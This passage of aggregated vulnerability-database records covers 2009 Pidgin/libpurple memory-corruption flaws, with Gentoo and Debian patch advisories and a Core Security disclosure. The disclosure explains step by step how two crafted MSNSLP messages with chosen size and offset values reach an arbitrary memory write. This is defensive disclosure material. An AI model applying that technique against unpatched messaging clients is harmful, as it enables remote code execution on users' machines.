9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200905-07\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: Pidgin: Multiple vulnerabilities\r\n Date: May 25, 2009\r\n Bugs: #270811\r\n ID: 200905-07\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nMultiple vulnerabilities in Pidgin might allow for the remote execution\r\nof arbitrary code or a Denial of Service.\r\n\r\nBackground\r\n==========\r\n\r\nPidgin &#40;formerly Gaim&#41; is an instant messaging client for a variety of\r\ninstant messaging protocols.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 net-im/pidgin &lt; 2.5.6 &gt;= 2.5.6\r\n\r\nDescription\r\n===========\r\n\r\nMultiple vulnerabilities have been discovered in Pidgin:\r\n\r\n* Veracode reported a boundary error in the &quot;XMPP SOCKS5 bytestream\r\n server&quot; when initiating an outgoing file transfer &#40;CVE-2009-1373&#41;.\r\n\r\n* Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol\r\n handler &#40;CVE-2009-1374&#41;.\r\n\r\n* A memory corruption flaw in &quot;PurpleCircBuffer&quot; was disclosed by\r\n Josef Andrysek &#40;CVE-2009-1375&#41;.\r\n\r\n* The previous fix for CVE-2008-2927 contains a cast from uint64 to\r\n size_t, possibly leading to an integer overflow &#40;CVE-2009-1376, GLSA\r\n 200901-13&#41;.\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could send specially crafted messages or files using\r\nthe MSN, XMPP or QQ protocols, possibly resulting in the execution of\r\narbitrary code with the privileges of the user running the application,\r\nor a Denial of Service. NOTE: Successful exploitation might require the\r\nvictim&#39;s interaction.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Pidgin users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose &quot;&gt;=net-im/pidgin-2.5.6&quot;\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CVE-2009-1373\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\r\n [ 2 ] CVE-2009-1374\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\r\n [ 3 ] CVE-2009-1375\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\r\n [ 4 ] CVE-2009-1376\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\r\n [ 5 ] GLSA 200901-13\r\n http://www.gentoo.org/security/en/glsa/glsa-200901-13.xml\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200905-07.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2009 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner&#40;s&#41;.\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "edition": 1, "modified": "2009-05-26T00:00:00", "published": "2009-05-26T00:00:00", "id": "SECURITYVULNS:DOC:21887", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21887", "title": "[ GLSA 200905-07 ] Pidgin: Multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1805-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nMay 22, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : pidgin\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id&#40;s&#41; : CVE-2009-1373 CVE-2009-1375 CVE-2009-1376\r\n\r\nSeveral vulnerabilities have been discovered in Pidgin, a graphical\r\nmulti-protocol instant messaging client. The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2009-1373\r\n\r\n A buffer overflow in the Jabber file transfer code may lead to\r\n denial of service or the execution of arbitrary code.\r\n\r\nCVE-2009-1375\r\n\r\n Memory corruption in an internal library may lead to denial of\r\n service.\r\n\r\nCVE-2009-1376\r\n\r\n The patch provided for the security issue tracked as CVE-2008-2927\r\n - integer overflows in the MSN protocol handler - was found to be\r\n incomplete.\r\n\r\nThe old stable distribution &#40;etch&#41; is affected under the source package\r\nname gaim. However, due to build problems the updated packages couldn&#39;t\r\nbe released along with the stable version. It will be released once the\r\nbuild problem is resolved.\r\n\r\nFor the stable distribution &#40;lenny&#41;, these problems have been fixed in\r\nversion 2.4.3-4lenny2.\r\n\r\nFor the unstable distribution &#40;sid&#41;, these problems have been fixed in\r\nversion 2.5.6-1.\r\n\r\nWe recommend that you upgrade your pidgin packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2.dsc\r\n Size/MD5 checksum: 1784 3cfbe1a429a466d82ca72b8c1ac40754\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2.diff.gz\r\n Size/MD5 checksum: 67015 ca8a67c8a5fbb7952c39e96dfc1c92d6\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\r\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 133450 0da42200c15fa112d10949833c7b656d\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 276786 98123cf4a705addb4f011b1a9aa42806\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 159310 af40922a5c347da65bb3287d7832f488\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 193330 79cfc03245a6ee2d54f3f1f8f2437f97\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny2_all.deb\r\n Size/MD5 checksum: 7018686 2c14cc93703b4d57f1134280ef019f87\r\n\r\nalpha architecture &#40;DEC Alpha&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 776034 998feb438dce3551770cc3f98576246b\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 5543240 5190a80c71672e30de68d6f5ce3385f5\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 370102 6ca853190995d40ffe833c19a9d0b130\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_alpha.deb\r\n Size/MD5 checksum: 1800160 f6d957047912550df9f2876cc3ae7d8a\r\n\r\namd64 architecture &#40;AMD x86_64 &#40;AMD64&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 5669542 1e21b6071f0947ac4153147ff07bb546\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 727040 bef84ab7a06038f3c47532809873823f\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 347640 8d9b18516cb3f836cafed50fca1425dd\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_amd64.deb\r\n Size/MD5 checksum: 1713090 e6224ab98f1d68df3cb10a6c2033bf06\r\n\r\narm architecture &#40;ARM&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 656814 240d7bf1b6f79ad6a31fed92eedf6080\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 5358320 f7c4ea8a35083db8e461bad0b70906fa\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 316126 68b0666de2045a8574f7d50919883858\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_arm.deb\r\n Size/MD5 checksum: 1490918 46ae049e5cb0539870f305e4868e2e42\r\n\r\narmel architecture &#40;ARM EABI&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 5383624 73ae62f4b416c5ebfc792231c66f8ca1\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 319456 546b24abfb2c38aa2572ba90c48bc095\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 667564 a30c4906f3ad9ca042741c122b99cf31\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_armel.deb\r\n Size/MD5 checksum: 1494952 a51898e2f3766423dbe6b584769b6db0\r\n\r\nhppa architecture &#40;HP PA RISC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 753668 f70ef43544c55771852789bec4bf94e0\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 5489574 64a4227ef892258851004c21841b94e6\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 361010 52121ede100f605ea53423fff2d7300a\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_hppa.deb\r\n Size/MD5 checksum: 1827456 aacc5b3a8fadc0d4576e7a191c457e68\r\n\r\ni386 architecture &#40;Intel ia32&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 1584030 b7241b147ae106b236b3c19860b3fd04\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 680872 399492517586fb1277892bd3fb3bf7b5\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 5374090 0408715682fda4b1fcb1945e7d6770ee\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_i386.deb\r\n Size/MD5 checksum: 326552 eba36a04da368b35f858a88f1034469c\r\n\r\nia64 architecture &#40;Intel ia64&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 948018 def22510f06bbb084d56b6c402a474cc\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 2194234 8891d61cba33f2a9e434e7e12541a636\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 434572 19b4d9631440cf2fe92abfd032ed8bfd\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_ia64.deb\r\n Size/MD5 checksum: 5223568 d6e5076c460293e3265147b26434c1d8\r\n\r\nmips architecture &#40;MIPS &#40;Big Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 5655552 3939bde10319e1ed310d607f782e692e\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 653818 5ba191b2eb2d299ab36f8f08a2261bf4\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 318128 3e41d036421525584379abce4d893d17\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_mips.deb\r\n Size/MD5 checksum: 1373126 f4d12c42ad8577233f6f289e5ee27a49\r\n\r\nmipsel architecture &#40;MIPS &#40;Little Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 318118 2f291b88715934b7ab36f6f551e5bb25\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 1358266 ca0716e2a4bcf3d6737913a6f13b03ab\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 650804 258c2a0b93d7714120346ec6037c79f2\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_mipsel.deb\r\n Size/MD5 checksum: 5544090 ff48eadd054ae5c758920e8ca8f42df4\r\n\r\npowerpc architecture &#40;PowerPC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 1760236 03b52ff4df575157cc21ed1b86e925af\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 362840 9f65e44425a193783f9f1201050a6be3\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 5578900 0e70281f616a1cd67d02c4a5e07c776f\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_powerpc.deb\r\n Size/MD5 checksum: 753758 642d77cf4334d7c4aa8a84bb7d9699f8\r\n\r\ns390 architecture &#40;IBM S/390&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 717168 cd1cb86f77fe1e618d9672d28af70170\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 5566916 20978bccaccbc40cbc5d4724627f148c\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 358728 8bab5444b68d96d61ad17d4a06572828\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_s390.deb\r\n Size/MD5 checksum: 1645716 c70783f5beacb8de41aecec6716f1a5a\r\n\r\nsparc architecture &#40;Sun SPARC/UltraSPARC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 5138450 93d398c20768690981b72145004b55cb\r\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 682926 4487a4faeb57750c1b63a437caefee8c\r\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 1587786 2d2a043944b81d6cbcedf092c9f6e005\r\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_sparc.deb\r\n Size/MD5 checksum: 327572 9dcaa99102693093ef770e24e748dd0c\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: &#96;apt-cache show &lt;pkg&gt;&#39; and http://packages.debian.org/&lt;pkg&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAkoXBLsACgkQXm3vHE4uylqYhwCgpviMfpfRRdBhDQAq2FfRPxam\r\nEk4An0udvE+xSS9Lgk4pYBbBx0BhNUEp\r\n=Ou7B\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-05-25T00:00:00", "published": "2009-05-25T00:00:00", "id": "SECURITYVULNS:DOC:21869", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21869", "title": "[SECURITY] [DSA 1805-1] New pidgin packages fix several vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "Memory corruption on malcrafted filename in MSN protocol. Buffer overflow on Jabber file transfer. Buffer overflow in QQ protocol.", "edition": 1, "modified": "2009-05-26T00:00:00", "published": "2009-05-26T00:00:00", "id": "SECURITYVULNS:VULN:9114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9114", "title": "Pidgin memory corruption", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nLibpurple msn_slplink_process_msg&#40;&#41; Arbitrary Write Vulnerability\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Libpurple msn_slplink_process_msg&#40;&#41; Arbitrary Write Vulnerability\r\nAdvisory ID: CORE-2009-0727\r\nAdvisory URL: http://www.coresecurity.com/content/libpurple-arbitrary-write\r\nDate published: 2009-08-18\r\nDate of last update: 2009-08-18\r\nVendors contacted: Pidgin team\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Memory corruption\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID:\r\nCVE Name: CVE-2009-2694\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nPidgin &#40;formerly named Gaim&#41; is a multi-platform instant messaging\r\nclient, based on a library named libpurple. Libpurple has support for\r\nmany commonly used instant messaging protocols, allowing the user to log\r\ninto various different services from one application.\r\n\r\nA remote arbitrary-code-execution vulnerability has been found in\r\nLibpurple &#40;used by Pidgin and Adium instant messaging clients, among\r\nothers&#41;, which can be triggered by a remote attacker by sending a\r\nspecially crafted MSNSLP packet [4] with invalid data to the client\r\nthrough the MSN server. No victim interaction is required, and the\r\nattacker is not required to be in the victim&#39;s buddy list &#40;under default\r\nconfiguration&#41;.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Gaim &gt;= 0.79\r\n . Libpurple &lt;= 2.5.8 &#40;Pidgin &lt;= 2.5.8 and Adium &lt;= 1.3.5&#41;\r\n . Other Libpurple frontends such as Finch might be vulnerable as well.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Libpurple &gt;= 2.6.0 &#40;Pidgin &gt;= 2.6.0&#41;\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThe default privacy settings allow any remote entity to contact an MSN\r\nuser, so the attacker is not required to be in the victim&#39;s buddy list.\r\nThe attack can be mitigated by setting the privacy settings for MSN\r\naccounts to &quot;Allow only the users below&quot; &#40;by default, the list of people\r\non the buddy list&#41;.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Federico Muttis from\r\nCore Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Overview*\r\n\r\nThe flaw exists within the function &#39;msn_slplink_process_msg&#40;&#41;&#39; of\r\nLibpurple &lt;= 2.5.8, which fails to properly validate an offset value\r\nspecified in a MSNSLP packet [4].\r\n\r\nThis affects at least two widely used products: Pidgin &lt;= 2.5.8 [1] and\r\nAdium &lt;= 1.3.5 [2].\r\n\r\nAccording to their website [3], Libpurple is also used by:\r\n\r\n . Apollo IM - IM application for the iPhone and iPod Touch.\r\n . EQO - an IM program for mobile phones.\r\n . Finch - a text-based IM program that works well in Linux and other\r\nUnixes.\r\n . Instantbird - a graphical IM program based on Mozilla&#39;s XUL framework.\r\n . Meebo - a web-based IM program.\r\n . Telepathy-Haze - a connection manager for the Telepathy IM framework.\r\n\r\n These programs may also be vulnerable.\r\n\r\nIf the victim has its privacy settings set to &quot;everyone can contact me&quot;,\r\nthe victim is not required to be in the attacker&#39;s contact list.\r\nOtherwise that is the only requirement for exploitation and no other\r\nvictim interaction is required.\r\n\r\nBy sending a specially crafted packet, an attacker can write an\r\narbitrary address with controlled data, resulting in arbitrary code\r\nexecution.\r\n\r\n\r\n8.2. *Previous patches*\r\n\r\nA similar vulnerability was already reported in CVE-2008-2927 [5] and\r\nCVE-2009-1376 [6]. CVE-2008-2927 added some bounds checking in\r\n&#39;msn_slplink_process_msg&#40;&#41;&#39;, specifically:\r\n\r\n/-----------\r\n\r\nif &#40;G_MAXSIZE - len &lt; offset || &#40;offset=&#39;&#39; + len=&#39;&#39;&#41; &gt; slpmsg-&gt;size&#41;\r\n{\r\n .. discard packet ..\r\n} else {\r\n .. vulnerable memcpy ..\r\n}\r\n\r\n- -----------/\r\n\r\n CVE-2009-1376 demonstrates that this can be exploited. The idea of the\r\npatch for CVE-2009-1376 was to fix a casting error, where an unsigned 64\r\nbits integer was casted to an unsigned 32 bits integer in the following\r\nline:\r\n\r\n/-----------\r\n\r\ndeclaration of offset;\r\n...\r\noffset = msg-&gt;msnslp_header.offset;\r\n\r\n- -----------/\r\n\r\n\r\n\r\nThe declaration of offset was changed from &#39;gsize&#39; to &#39;guint64&#39; in\r\n2.5.8. This approach is clearly not enough, we found that by providing\r\ndifferent size/offset values, the call to memcpy&#40;&#41; can still be reached\r\nwith almost any value. The first PoC we constructed to trigger this\r\nvulnerability was fixed by the patch introduced in Libpurple 2.5.6, but\r\nby working on it a little more, we triggered the bug again in Libpurple\r\n2.5.8. We conclude that the fix was incomplete.\r\n\r\n\r\n8.3. *Exploitation of Libpurple 2.5.8*\r\n\r\nThe attack consists in sending two consecutive MSNSLP messages [4]. The\r\nfirst one is used to store a &#39;slpmsg&#39; with our session id, and the\r\nsecond one to trigger the vulnerability.\r\n\r\nOur goal is to reach the &#39;memcpy&#40;&#41;&#39; invocation in\r\n&#39;msn_slplink_process_msg&#40;&#41;&#39;. We need to construct a MSNSLP message with\r\nan offset different from zero &#40;as this value will be the destination of\r\nthe vulnerable &#39;memcpy&#40;&#41;&#39;&#41;.\r\n\r\nAs the offset will be different from zero, the first problem arises when\r\na call to &#39;msn_slplink_message_find&#40;&#41;&#39; returns NULL:\r\n\r\n/-----------\r\n\r\nif &#40;offset == 0&#41;\r\n{\r\n .. construct a new slpmsg ..\r\n}\r\nelse\r\n{\r\n slpmsg = msn_slplink_message_find&#40;slplink,\r\nmsg-&gt;msnslp_header.session_id, msg-&gt;msnslp_header.id&#41;;\r\n}\r\n\r\nif &#40;slpmsg == NULL&#41;\r\n{\r\n /* Probably the transfer was canceled */\r\n purple_debug_error&#40;&quot;msn&quot;, &quot;Couldn&#39;t find slpmsg&#92;n&quot;&#41;;\r\n return;\r\n}\r\n\r\n- -----------/\r\n\r\n So, &#39;slpmsg&#39; must be different from NULL. And this is exactly why this\r\nis a two-message attack. We need to send a first MSNSLP message, with an\r\noffset equal to zero, that constructs a slpmsg object, so Libpurple will\r\nstore it. The second MSNSLP message will have an offset value different\r\nfrom zero, but as Libpurple stored our first MSNSLP message, the call to\r\n&#39;msn_slplink_message_find&#40;&#41;&#39; will effectively return our previous\r\nobject, instead of NULL.\r\n\r\nSo we reach:\r\n\r\n/-----------\r\n\r\nif &#40;slpmsg-&gt;fp&#41;\r\n{\r\n /* fseek&#40;slpmsg-&gt;fp, offset, SEEK_SET&#41;; */\r\n len = fwrite&#40;data, 1, len, slpmsg-&gt;fp&#41;;\r\n}\r\nelse if &#40;slpmsg-&gt;size&#41;\r\n{\r\n if &#40;G_MAXSIZE - len &lt; offset || &#40;offset=&#39;&#39; + len=&#39;&#39;&#41; &gt; slpmsg-&gt;size&#41;\r\n {\r\n purple_debug_error&#40;&quot;msn&quot;,\r\n &quot;Oversized slpmsg - msgsize=&#37;lld offset=&#37;&quot; G_GSIZE_FORMAT &quot;\r\nlen=&#37;&quot; G_GSIZE_FORMAT &quot;&#92;n&quot;,\r\n slpmsg-&gt;size, offset, len&#41;;\r\n g_return_if_reached&#40;&#41;;\r\n }\r\n else\r\n memcpy&#40;slpmsg-&gt;buffer + offset, data, len&#41;;\r\n }\r\n\r\n- -----------/\r\n\r\n For example, if we construct our first MSNSLP message with a size of\r\n&#39;0x01ffffff&#39;, and the second one &#40;which is being processed and whose\r\noffset is assigned to the offset variable&#41; has an offset of an arbitrary\r\nvalue lower than &#39;0x01ffffff - len&#39;, then the conditions for an\r\narbitrary write are met.\r\n\r\nFinally, we reach &#39;memcpy&#40;&#41;&#39; with an offset of any value lower than\r\n&#39;0x01ffffff - len&#39; and the buffer pointing to 0. This means that we can\r\nwrite the contents of data in an arbitrary location lower than\r\n&#39;0x01ffffff - len&#39;, which allows arbitrary code execution in almost any\r\nplatform.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-07-28:\r\nCore Security Technologies notifies the Pidgin team of the vulnerability\r\nand schedules a preliminary publication date to August 18th.\r\n\r\n. 2009-07-28:\r\nPidgin team requests technical details &#40;in plaintext or encrypted&#41;.\r\n\r\n. 2009-07-30:\r\nCore sends the advisory draft, encrypted, including technical details.\r\n\r\n. 2009-07-30:\r\nPidgin team acknowledges reception of the draft.\r\n\r\n. 2009-07-31:\r\nPidgin team notifies Core that they cannot reproduce the bug.\r\n\r\n. 2009-07-31:\r\nCore sends proof of concept code to the Pidgin team.\r\n\r\n. 2009-08-10:\r\nCore requests the Pidgin team an update on the bug status and fixes.\r\n\r\n. 2009-08-13:\r\nPidgin team confirms Core that fixes will be ready by August 18th, and\r\nsends information regarding affected versions and mitigations.\r\n\r\n. 2009-08-13:\r\nCore acknowledges the information sent by Pidgin team.\r\n\r\n. 2009-08-18:\r\nThe advisory CORE-2009-0727 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] Pidgin http://www.pidgin.im/\r\n[2] Adium http://adium.im/\r\n[3] Libpurple http://developer.pidgin.im/wiki/WhatIsLibpurple\r\n[4] MSNSLP http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP\r\n[5] CVE-2008-2927\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927\r\n[6] CVE-2009-1376\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, 